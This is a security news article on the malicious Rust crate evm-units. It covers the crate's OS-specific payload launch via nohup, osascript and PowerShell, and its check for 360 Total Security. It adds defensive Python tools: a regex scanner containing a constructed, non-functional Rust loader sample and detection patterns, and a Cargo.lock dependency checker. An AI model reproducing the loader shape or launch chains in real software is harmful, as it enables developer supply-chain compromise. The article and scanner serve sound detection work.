Malicious Rust Crate Targets Web3 Developers with OS-Specific Malware

Cybersecurity analysts have identified a malicious Rust-based package crafted to infiltrate systems running Windows, macOS, or Linux. The package silently executes malicious code on developer machines by disguising itself as a legitimate Ethereum Virtual Machine (EVM) utility.

The crate, named evm-units, was uploaded to crates.io in April 2025 by an account named ablerust. Over eight thousand downloads were recorded before the package was removed from the repository. A second package from the same author, uniswap-utils, listed evm-units as a dependency and received more than seven thousand downloads.

According to researcher Olivia Brown from Socket, the malicious crate fingerprints the victim system to determine the operating environment and whether Qihoo 360 antivirus is active. Based on this information, it retrieves and executes a hidden payload from an external server while returning a fake Ethereum version value, so the calling code sees a normal result and victims remain unaware of the compromise.

Antivirus Focus Raises Suspicion

A key detail is the crate’s explicit check for qhsafetray.exe, a process belonging to 360 Total Security. Brown notes that this focus reveals a China-centered targeting pattern, since Qihoo 360 is a prominent Chinese security company. The behavior aligns with recent cryptocurrency theft campaigns aimed at regions with large crypto user bases.

OS-Specific Execution Chain

The malicious function get_evm_version decodes obfuscated instructions and contacts an external domain, download[.]videotalks[.]xyz, to fetch the next-stage payload.

The behavior differs across operating systems:

  • Linux: downloads a script, stores it in the temp folder, and launches it in the background with the nohup command
  • macOS: downloads a file named init and runs it through osascript in a background process
  • Windows: drops a PowerShell script named init.ps1 into the temp directory and checks for the antivirus process before execution

If 360 Total Security is absent, the crate creates a VBScript wrapper to run PowerShell silently. If the antivirus is detected, it changes tactics and invokes PowerShell directly instead.
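As an added example, not from the article and not Socket's tooling, the Python triage pass below scans Rust source for the combination of indicators described above: the 360 Total Security process check, per-OS branching, temp-directory staging, the nohup/osascript/PowerShell launch, a VBScript wrapper, and a network fetch. The sample crate source it scans is constructed for this example and is not the real crate's code; the indicator names, regexes and verdict thresholds are my own heuristics, intended for a first look at an unfamiliar crate rather than as a signature.

```python
"""Static triage heuristics for Rust source, modelled on the evm-units
indicators described in the article. Added example; the sample source
below is constructed and deliberately non-functional (decode and B64_BLOB
are undefined placeholders)."""
import re

# Constructed stand-in for the loader shape the article describes.
SAMPLE_RS = r'''
pub fn get_evm_version() -> String {
    let url = decode(B64_BLOB);      // placeholder for the decoded download[.]videotalks[.]xyz URL
    let _body = ureq::get(&url).call();
    let temp = std::env::temp_dir();
    if cfg!(target_os = "windows") {
        let av = Command::new("tasklist").output().unwrap();
        if !String::from_utf8_lossy(&av.stdout).contains("qhsafetray.exe") {
            std::fs::write(temp.join("run.vbs"), VBS_WRAPPER).ok();
        }
        Command::new("powershell").arg("-File").arg(temp.join("init.ps1")).spawn().ok();
    } else if cfg!(target_os = "macos") {
        Command::new("osascript").arg(temp.join("init")).spawn().ok();
    } else {
        Command::new("nohup").arg("sh").arg(temp.join("init.sh")).spawn().ok();
    }
    "1.0.0".to_string()   // fake EVM version handed back to the caller
}
'''

# Constructed benign sample: a plausible real EVM helper with none of the markers.
CLEAN_RS = r'''
pub fn wei_to_eth(wei: u128) -> f64 { wei as f64 / 1e18 }
'''

# name -> (regex, why a reviewer cares); names are this example's own labels
INDICATORS = {
    "av_process_check": (r"qhsafetray\.exe", "looks for 360 Total Security (China-focused targeting)"),
    "os_branching":     (r"cfg!\(target_os\s*=", "selects behaviour per operating system"),
    "temp_staging":     (r"temp_dir\(\)", "stages a file in the temp directory"),
    "linux_bg_exec":    (r"\"nohup\"", "detaches a process on Linux"),
    "macos_bg_exec":    (r"\"osascript\"", "runs a payload through osascript on macOS"),
    "windows_ps_exec":  (r"\"powershell\"", "invokes PowerShell on Windows"),
    "vbs_wrapper":      (r"\.vbs\b", "writes a VBScript wrapper for silent PowerShell"),
    "remote_fetch":     (r"\b(ureq|reqwest)::", "fetches content from the network"),
}
EXEC_INDICATORS = {"linux_bg_exec", "macos_bg_exec", "windows_ps_exec"}


def triage_source(src):
    """Return a verdict plus the indicators found in one Rust source file."""
    hits = [name for name, (pat, _) in INDICATORS.items() if re.search(pat, src)]
    launches = EXEC_INDICATORS & set(hits)
    # Network fetch + temp staging + a launch primitive is the loader shape;
    # any single hit is still worth a human look.
    if "remote_fetch" in hits and "temp_staging" in hits and launches:
        verdict = "loader-like"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits,
            "reasons": [INDICATORS[h][1] for h in hits]}


def triage_crate(files):
    """files: {path: source}. Returns per-file results and the worst verdict."""
    rank = {"clean": 0, "review": 1, "loader-like": 2}
    results = {path: triage_source(src) for path, src in files.items()}
    worst = max((r["verdict"] for r in results.values()), key=rank.get, default="clean")
    return {"files": results, "worst": worst}


if __name__ == "__main__":
    report = triage_crate({"src/lib.rs": SAMPLE_RS, "src/units.rs": CLEAN_RS})
    for path, res in report["files"].items():
        print(f"{path}: {res['verdict']} {res['indicators']}")
    print("worst:", report["worst"])
```

Run it against an unpacked crate by feeding each `.rs` file into `triage_crate`; a hit on `av_process_check` alone is unusual enough in a utility crate to justify reading the function by hand.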

Web3 Developers in the Crosshairs

The references to EVM utilities and Uniswap, a major decentralized exchange protocol, indicate that the operation was designed to target Web3 developers. By embedding the malicious loader inside a harmless-looking function and pulling it in through a dependency that reads like a widely used library, the attacker ensured that the malware would execute automatically as soon as the package was used.

Brown stated that ablerust embedded a cross-platform second-stage component in the code, which was triggered whenever developers interacted with the tool.
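Because the second crate reached victims through the dependency graph rather than by name, the practical check for a developer is whether a project's Cargo.lock pulls in the flagged crate at any depth. The Python below is an added example, not from the article or Socket: it parses the `[[package]]` tables of a Cargo.lock and walks the graph from a root crate to report the path to any flagged name. The lock file is constructed to mirror the uniswap-utils to evm-units relationship the article describes; the root crate name `my-dapp-tool` and all version numbers are placeholders.

```python
"""Find whether a Cargo.lock pulls in a flagged crate, directly or transitively,
and report the dependency path. Added example; the lock file below is
constructed, and its crate versions are placeholders."""
from collections import deque

FLAGGED = {"evm-units"}   # crate name from the article; extend from an advisory feed

SAMPLE_LOCK = """\
[[package]]
name = "my-dapp-tool"
version = "0.1.0"
dependencies = [
 "uniswap-utils",
 "serde",
]

[[package]]
name = "uniswap-utils"
version = "0.0.0"
dependencies = [
 "evm-units",
]

[[package]]
name = "evm-units"
version = "0.0.0"

[[package]]
name = "serde"
version = "1.0.0"
"""


def parse_cargo_lock(text):
    """Minimal parser for Cargo.lock [[package]] tables: returns {name: [dep names]}.
    Dependency entries may carry a version ("foo 1.2.3"); only the name is kept."""
    graph = {}
    name, deps, in_deps = None, [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "[[package]]":
            if name is not None:
                graph[name] = deps
            name, deps, in_deps = None, [], False
        elif in_deps:
            if line.startswith("]"):
                in_deps = False
            elif line.startswith('"'):
                deps.append(line.strip('",').split()[0])
        elif line.startswith("name = "):
            name = line.split("=", 1)[1].strip().strip('"')
        elif line.startswith("dependencies = ["):
            in_deps = not line.endswith("]")     # single-line lists close immediately
            if not in_deps:
                inner = line.split("[", 1)[1].rsplit("]", 1)[0]
                deps.extend(d.strip().strip('"').split()[0]
                            for d in inner.split(",") if d.strip())
    if name is not None:
        graph[name] = deps
    return graph


def dependency_paths(graph, root, flagged=FLAGGED):
    """Breadth-first walk from root. Returns {flagged_name: [root, ..., flagged_name]}
    for every flagged crate reachable through the lock file."""
    paths, queue, seen = {}, deque([[root]]), {root}
    while queue:
        path = queue.popleft()
        for dep in graph.get(path[-1], []):
            if dep in seen:
                continue
            seen.add(dep)
            new_path = path + [dep]
            if dep in flagged:
                paths[dep] = new_path
            queue.append(new_path)
    return paths


if __name__ == "__main__":
    graph = parse_cargo_lock(SAMPLE_LOCK)
    for crate, path in dependency_paths(graph, "my-dapp-tool").items():
        print(f"flagged crate {crate} reached via: {' -> '.join(path)}")
```

Point `parse_cargo_lock` at a real lock file's contents and use the workspace's own package name as the root; an empty result means none of the flagged names are reachable from that package.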
